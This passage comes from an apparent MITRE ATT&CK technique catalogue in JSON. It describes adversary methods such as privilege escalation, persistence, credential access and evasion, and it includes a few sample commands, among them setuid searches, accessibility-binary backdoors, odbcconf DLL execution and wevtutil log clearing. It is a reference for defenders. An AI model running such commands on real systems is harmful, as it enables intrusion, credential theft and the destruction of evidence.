Binary Padding because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware’s signature.", "detection": ""}, {"attack_id": "T1548", "name": "Abuse Elevation Control Mechanism", "tactics": ["privilege-escalation"], "platforms": ["Linux", "macOS", "Windows", "IaaS", "Office Suite", "Identity Provider"], "description": "Adversaries may circumvent mechanisms designed to control privilege elevation to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.", "detection": ""}, {"attack_id": "T1134.002", "name": "Create Process with Token", "tactics": ["stealth", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas. Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via Token Impersonation/Theft or created via Make and Impersonate Token before being used to create a process. While this technique is distinct from Token Impersonation/Theft, the techniques can be used in conjunction where a token is duplicated and then used to create a new process.", "detection": ""}, {"attack_id": "T1548.001", "name": "Setuid and Setgid", "tactics": ["privilege-escalation"], "platforms": ["Linux", "macOS"], "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively. Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. Linux and Mac Permissions). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future. This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. File and Directory Discovery). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.", "detection": ""}, {"attack_id": "T1547.004", "name": "Winlogon Helper DLL", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: * Winlogon\\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.", "detection": ""}, {"attack_id": "T1021.003", "name": "Distributed Component Object Model", "tactics": ["lateral-movement"], "platforms": ["Windows"], "description": "Adversaries may use Valid Accounts to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology. Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. By default, only Administrators may remotely activate and launch COM objects through DCOM. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications as well as other Windows objects that contain insecure methods. DCOM can also execute macros in existing documents and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application, bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with Windows Management Instrumentation.", "detection": ""}, {"attack_id": "T1110.003", "name": "Password Spraying", "tactics": ["credential-access"], "platforms": ["Containers", "ESXi", "IaaS", "Identity Provider", "Linux", "Network Devices", "Office Suite", "SaaS", "Windows", "macOS"], "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365. In order to avoid detection thresholds, adversaries may deliberately throttle password spraying attempts to avoid triggering security alerting. Additionally, adversaries may leverage LDAP and Kerberos authentication attempts, which are less likely to trigger high-visibility events such as Windows \"logon failure\" event ID 4625 that is commonly triggered by failed SMB connection attempts.", "detection": ""}, {"attack_id": "T1090.002", "name": "External Proxy", "tactics": ["command-and-control"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion. External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.", "detection": ""}, {"attack_id": "T1056.003", "name": "Web Portal Capture", "tactics": ["collection", "credential-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service.", "detection": ""}, {"attack_id": "T1589.002", "name": "Email Addresses", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Email addresses could also be enumerated via more active means (i.e. Active Scanning), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system. For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Email Accounts), and/or initial access (ex: Phishing or Brute Force via External Remote Services).", "detection": ""}, {"attack_id": "T1598.004", "name": "Spearphishing Voice", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Impersonation) and/or creating a sense of urgency or alarm for the recipient. All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \"vishing\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff. Victims may also receive phishing messages that direct them to call a phone number (\"callback phishing\") where the adversary attempts to collect confidential information. Adversaries may also use information from previous reconnaissance efforts (ex: Search Open Websites/Domains or Search Victim-Owned Websites) to tailor pretexts to be even more persuasive and believable for the victim.", "detection": ""}, {"attack_id": "T1683.001", "name": "Written Content", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may create or tailor written materials to support targeting and malicious operations. Content may include phishing lures, fraudulent financial communications, fabricated job postings, fabricated employment credentials and documentation, decoy documents, social media persona content, and supporting narratives used to sustain fabricated personas over time. Content may be authored manually, commissioned through third parties, or produced using AI-assisted tools. Written materials may impersonate legitimate government correspondence, diplomatic communications, or internal organizational documents to support targeting efforts. AI-assisted tools may also be used to tailor content to specific targets, industries, or regions. For example, adversaries may leverage AI to translate content into a target's native language or mimic the communication style of trusted senders. Written content produced through these methods may be used in support of other techniques, such as Phishing, Spearphishing via Service, Phishing for Information, Internal Spearphishing, Social Engineering, Financial Theft, or Establish Accounts. Written content does not include malicious code or scripts; for development of malicious code and scripts, see Develop Capabilities.", "detection": ""}, {"attack_id": "T1003.005", "name": "Cached Domain Credentials", "tactics": ["credential-access"], "platforms": ["Windows", "Linux"], "description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable. On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash. The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires Password Cracking to recover the plaintext password. On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use Password Cracking to obtain the plaintext password. With SYSTEM or sudo access, the tools/utilities such as Mimikatz, Reg, and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials. Note: Cached credentials for Windows Vista are derived using PBKDF2.", "detection": ""}, {"attack_id": "T1098.004", "name": "SSH Authorized Keys", "tactics": ["persistence", "privilege-escalation"], "platforms": ["ESXi", "IaaS", "Linux", "macOS", "Network Devices"], "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys (or, on ESXi, `/etc/ssh/keys-/authorized_keys`). Users may edit the system’s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account. Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH. It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user. Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` Network Device CLI command.", "detection": ""}, {"attack_id": "T1673", "name": "Virtual Machine Discovery", "tactics": ["discovery"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a Hypervisor CLI such as `esxcli` or `vim-cmd` (e.g. `esxcli vm process list or vim-cmd vmsvc/getallvms`). Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host. Adversaries may use the information from Virtual Machine Discovery during discovery to shape follow-on behaviors. Subsequently discovered VMs may be leveraged for follow-on activities such as Service Stop or Data Encrypted for Impact.", "detection": ""}, {"attack_id": "T1590.006", "name": "Network Security Appliances", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).", "detection": ""}, {"attack_id": "T1546.012", "name": "Image File Execution Options Injection", "tactics": ["privilege-escalation", "persistence"], "platforms": ["Windows"], "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the \"debugger\" program to be executed with SYSTEM privileges. Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. Malware may also use IFEO to impair defenses by registering invalid debuggers that redirect and effectively disable various system and security applications.", "detection": ""}, {"attack_id": "T1218.008", "name": "Odbcconf", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. The Odbcconf.exe binary may be digitally signed by Microsoft. Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}).", "detection": ""}, {"attack_id": "T1593.002", "name": "Search Engines", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes). Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Valid Accounts or Phishing).", "detection": ""}, {"attack_id": "T1591.002", "name": "Business Relationships", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise, Drive-by Compromise, or Trusted Relationship).", "detection": ""}, {"attack_id": "T1548.005", "name": "Temporary Elevated Cloud Access", "tactics": ["privilege-escalation"], "platforms": ["IaaS", "Office Suite", "Identity Provider"], "description": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted. Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts. In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts. Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource. While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended. **Note:** this technique is distinct from Additional Cloud Roles, which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control Additional Cloud Roles that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.", "detection": ""}, {"attack_id": "T1125", "name": "Video Capture", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen. In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton.", "detection": ""}, {"attack_id": "T1055.013", "name": "Process Doppelgänging", "tactics": ["stealth", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. Adversaries may abuse TxF to a perform a file-less variation of Process Injection. Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. Process Doppelgänging is implemented in 4 steps : * Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction. * Load – Create a shared section of memory and load the malicious executable. * Rollback – Undo changes to original executable, effectively removing malicious code from the file system. * Animate – Create a process from the tainted section of memory and initiate execution. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.", "detection": ""}, {"attack_id": "T1016", "name": "System Network Configuration Discovery", "tactics": ["discovery"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route. Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface). On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address. Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.", "detection": ""}, {"attack_id": "T1578.003", "name": "Delete Cloud Instance", "tactics": ["defense-impairment"], "platforms": ["IaaS"], "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable. An adversary may also Create Cloud Instance and later terminate the instance after achieving their objectives.", "detection": ""}, {"attack_id": "T1593.003", "name": "Code Repositories", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information), establishing operational resources (ex: Compromise Accounts or Compromise Infrastructure), and/or initial access (ex: Valid Accounts or Phishing). **Note:** This is distinct from Code Repositories, which focuses on Collection from private and internally hosted code repositories.", "detection": ""}, {"attack_id": "T1574.005", "name": "Executable Installer File Permissions Weakness", "tactics": ["stealth", "execution"], "platforms": ["Windows"], "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL search order hijacking. Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", "detection": ""}, {"attack_id": "T1546.008", "name": "Accessibility Features", "tactics": ["privilege-escalation", "persistence"], "platforms": ["Windows"], "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. Two common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. Other accessibility features exist that may also be leveraged in a similar fashion: * On-Screen Keyboard: C:\\Windows\\System32\\osk.exe * Magnifier: C:\\Windows\\System32\\Magnify.exe * Narrator: C:\\Windows\\System32\\Narrator.exe * Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe * App Switcher: C:\\Windows\\System32\\AtBroker.exe", "detection": ""}, {"attack_id": "T1496.002", "name": "Bandwidth Hijacking", "tactics": ["impact"], "platforms": ["Linux", "Windows", "macOS", "IaaS", "Containers"], "description": "Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate Network Denial of Service campaigns and/or to seed malicious torrents. Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services. Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise. In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.", "detection": ""}, {"attack_id": "T1087", "name": "Account Discovery", "tactics": ["discovery"], "platforms": ["ESXi", "IaaS", "Identity Provider", "Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default PowerShell and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.", "detection": ""}, {"attack_id": "T1090", "name": "Proxy", "tactics": ["command-and-control"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", "detection": ""}, {"attack_id": "T1059", "name": "Command and Scripting Interpreter", "tactics": ["execution"], "platforms": ["Containers", "ESXi", "IaaS", "Identity Provider", "Linux", "macOS", "Network Devices", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell. There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic. Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.", "detection": ""}, {"attack_id": "T1204.005", "name": "Malicious Library", "tactics": ["execution"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may Upload Malware to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. User may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency. In some cases, threat actors may compromise and backdoor existing popular libraries (i.e., Compromise Software Dependencies and Development Tools). Alternatively, they may create entirely new packages and leverage behaviors such as typosquatting to encourage users to install them.", "detection": ""}, {"attack_id": "T1685.005", "name": "Clear Windows Event Logs", "tactics": ["defense-impairment"], "platforms": ["Windows"], "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. With administrator privileges, the event logs can be cleared with the following utility commands: * `wevtutil cl system` * `wevtutil cl application` * `wevtutil cl security` These logs may also be cleared through other mechanisms, such as the event viewer GUI 